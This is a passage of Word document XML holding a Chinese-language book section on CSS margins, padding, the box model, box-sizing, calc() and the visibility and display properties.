        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border-top-right-radius:50px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>padding</w:t>
      </w:r>
      <w:r>
        <w:t>属性都指定元素周围的空白空间。主要的区别在于，</w:t>
      </w:r>
      <w:r>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:t>指定边框外面</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>边框和相邻元素之间的空间，而</w:t>
      </w:r>
      <w:r>
        <w:t>padding</w:t>
      </w:r>
      <w:r>
        <w:t>指定边框之内</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>边框和元素内容之间的空间。外边距提供了常规文档流中（可能有边框的</w:t>
      </w:r>
      <w:r>
        <w:t>）元素和它的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>邻居</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>之间的视觉空间。内边距保持元素内容和它的边框在视觉上分离。如果元素内没有边框，内边距往往也是没有必要的。如果元素是动态定位的，而不是常规文档流的一部分，它的外边距就无关要旨了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>padding</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定元素的外边距和内边距：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>margin:5px;padding:5px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>也可以为元素单独的边指定外边距和内边距：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>margin-left:25px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding-bottom:5px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>或者可以用</w:t>
      </w:r>
      <w:r>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>padding</w:t>
      </w:r>
      <w:r>
        <w:t>属性直接为元素所有的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>条边指定外边距和</w:t>
      </w:r>
      <w:r>
        <w:t>内边距。首先指定上边的值，然后按照顺时针方式设置：</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>上、右、下和左边的值。例如，以下代码显示了给元素的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>条边设置了不同的内边距值，两种方式是等价的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding:1px 2px 3px 4px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>以上代码等价于以下</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>行代码</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding-top:1px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding-right:2px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding-bottom:3px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padding-left:4px;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="409" w:name="16_2_3_CSSHe_Mo_Xing_He_Ding_Wei_Xi_Jie_"/>
      <w:r>
        <w:t>16.2.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>盒模型和定位细节</w:t>
      </w:r>
      <w:bookmarkEnd w:id="409"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>以上描述的</w:t>
      </w:r>
      <w:r>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>border</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>padding</w:t>
      </w:r>
      <w:r>
        <w:t>等样式属性在脚本化时很可能不经常使用。因为它们是</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>盒模型（</w:t>
      </w:r>
      <w:r>
        <w:t>box model</w:t>
      </w:r>
      <w:r>
        <w:t>）的一部分，而为了真正理解</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>定位属性，应该理解这个盒模型。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:t>16-2</w:t>
      </w:r>
      <w:r>
        <w:t>说明了</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>盒模型与有边框和内边距元素的</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>等意义的视觉解释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:t>16-2</w:t>
      </w:r>
      <w:r>
        <w:t>显示了一个绝对定位的元素嵌套在一个定位的容器元素中。容器和包含的元素都有边框和内边距，图例说明了指定容器元素每条边的内边距和边框宽度的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性。注意外边距属性并没有图示：外边距与绝对定位的元素</w:t>
      </w:r>
      <w:r>
        <w:t>无关。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251693056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4041475" cy="2273060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="34" name="00034.jpeg" descr="00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00034.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4041475" cy="2273060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>16-2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>盒模型：边框、内边距和定位属性</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:t>16-2</w:t>
      </w:r>
      <w:r>
        <w:t>也包含了其他重要的信息。首先，</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>只指定了元素内容区域的尺寸，它不包含元素的内边距或边框（或外边距）所需的任何额外空间。为了确定有边框元素在屏幕上的全尺寸，必须把元素的宽度加上左右两边的内边距和左右两个边框宽度，把元素的高度加上上下两边的内边距和上下两个边框宽度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>其次，</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定了从容器边框内侧到定位元素边框外侧的距离。这些属性不是从容器内容区域的左上角开始度量的，而是从容器内边距的左上角开始的</w:t>
      </w:r>
      <w:r>
        <w:t>。同样，</w:t>
      </w:r>
      <w:r>
        <w:t>right</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>bottom</w:t>
      </w:r>
      <w:r>
        <w:t>属性是从容器内边距的右下角开始度量的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有一个例子清楚地说明了这一点。假设已创建一个在内容区域四周有</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>像素内边距和</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>像素边框的动态定位的容器元素。现假设要动态定位一个容器中的子元素。如果将其</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"0px"</w:t>
      </w:r>
      <w:r>
        <w:t>，你会发现子元素的左边缘正好靠在容器左边框的右边，这样子元素</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>覆盖了容器的内边距，本意是要留出空白（指定容器内边距的目的），而空白却没有了。如果想在容器内容区域的左上角定位子元素，就必须将其</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定为</w:t>
      </w:r>
      <w:r>
        <w:t>"10px"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>边框盒模型和</w:t>
      </w:r>
      <w:r>
        <w:t>box-sizin</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>标准</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>盒模型规定</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>样式属性给定内容区域的尺寸，并且不包含内边距和边框。可以称此盒模型为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>内容盒模型</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。在老版的</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>里和新版的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>中都有一些例外，在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 6</w:t>
      </w:r>
      <w:r>
        <w:t>之前和当</w:t>
      </w:r>
      <w:r>
        <w:t>IE 6</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>怪异模式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>下显示一个页面时（页面中缺少＜</w:t>
      </w:r>
      <w:r>
        <w:t>!DOCTYPE</w:t>
      </w:r>
      <w:r>
        <w:t>＞或有一个不够严格的</w:t>
      </w:r>
      <w:r>
        <w:t>doctype</w:t>
      </w:r>
      <w:r>
        <w:t>时），</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性确是包含内边距和边框宽度的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的行为是一个</w:t>
      </w:r>
      <w:r>
        <w:t>bug</w:t>
      </w:r>
      <w:r>
        <w:t>，但是</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的非标准盒模型通常也很有用。认识到这一点，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>引进了</w:t>
      </w:r>
      <w:r>
        <w:t>box-sizing</w:t>
      </w:r>
      <w:r>
        <w:t>属性，默认值是</w:t>
      </w:r>
      <w:r>
        <w:t>content-box</w:t>
      </w:r>
      <w:r>
        <w:t>，它指定了上面描述的标准的盒模型。如果替换为</w:t>
      </w:r>
      <w:r>
        <w:t>box-sizing:border-box</w:t>
      </w:r>
      <w:r>
        <w:t>，浏览器将会为那个元素应用</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的盒模型，即</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性将包含边框和内边距。当想以百分比形式为元素设置总体尺寸，又想以像素单位指定边框和内边距时，边框盒模型特别有用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div style="box-sizing:border-box;width:50%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>padd</w:t>
      </w:r>
      <w:r>
        <w:t>ing:10px;border:solid black 2px;"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>box-sizing</w:t>
      </w:r>
      <w:r>
        <w:t>属性在当今所有的浏览器中都支持，但是还没有不带前缀通用地实现。在</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>中，使用</w:t>
      </w:r>
      <w:r>
        <w:t>-webkit-box-sizing</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>中，使用</w:t>
      </w:r>
      <w:r>
        <w:t>-moz-box-sizing</w:t>
      </w:r>
      <w:r>
        <w:t>。在</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>及其更高版本中，可以使用不带前缀的</w:t>
      </w:r>
      <w:r>
        <w:t>box-sizing</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>边框盒模型在未来</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个可选方案是使用盒子尺寸的计算值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>div style="width:calc(50%-12px);padding</w:t>
      </w:r>
      <w:r>
        <w:t>:10px;border:solid black 2px;"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>中支持使用</w:t>
      </w:r>
      <w:r>
        <w:t>calc()</w:t>
      </w:r>
      <w:r>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>的值，在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>-moz-calc()</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="410" w:name="16_2_4_Yuan_Su_Xian_Shi_He_Ke_Jian_Xing_"/>
      <w:r>
        <w:t>16.2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　元素显示和可见性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="410"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>两个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性影响了文档元素的可见性：</w:t>
      </w:r>
      <w:r>
        <w:t>visibility</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>visibility</w:t>
      </w:r>
      <w:r>
        <w:t>属性很简单：当其值设置为</w:t>
      </w:r>
      <w:r>
        <w:t>hidden</w:t>
      </w:r>
      <w:r>
        <w:t>时，该元素不显示；当其值设置为</w:t>
      </w:r>
      <w:r>
        <w:t>visible</w:t>
      </w:r>
      <w:r>
        <w:t>时，该元素显示。</w:t>
      </w:r>
      <w:r>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:t>属性更加通用，它用来为接收它的容器指定元素的显示类型。它指定元素是否是块状元素、内联元素、列表项等。但是，如果</w:t>
      </w:r>
      <w:r>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>none</w:t>
      </w:r>
      <w:r>
        <w:t>，受影响的元素将不显示，甚至根本没有布局。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>visibility</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:t>属性之间的差别可以从它们对使用静态或相当定位的元素的影响中看到。对于一个常规布局流中的元</w:t>
      </w:r>
      <w:r>
        <w:t>素，设置</w:t>
      </w:r>
      <w:r>
        <w:t>visibility</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>hidden</w:t>
      </w:r>
      <w:r>
        <w:t>使得元素不可见，但是在文档布局中仍保留了它的空间。类似的元素可以重复隐藏和显示而不改变文档布局。但是，如果元素的</w:t>
      </w:r>
      <w:r>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>none</w:t>
      </w:r>
      <w:r>
        <w:t>，在文档布局中不再给它分配空间，它各边的元素会合拢，就当它从来不存在。例如，在创建展开和折叠轮廓的效果时</w:t>
      </w:r>
      <w:r>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:t>属性很有用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>visibility</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:t>属性对绝对和固定定位的元素的影响是等价的，因为这些元素都不是文档布局的一部分。然而，在隐藏和显示定位元素时一般首选</w:t>
      </w:r>
      <w:r>
        <w:t>visibility</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，用</w:t>
      </w:r>
      <w:r>
        <w:t>vi</w:t>
      </w:r>
      <w:r>
        <w:t>sibility</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>display</w:t>
      </w:r>
      <w:r>
        <w:t>属性使得元素不可见没什么意义，除非使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>动态设置这些属性让元素在某一刻可见！将在本章后续内容中看到如何实现这种技术。</w:t>
      </w:r>
    </w:p>
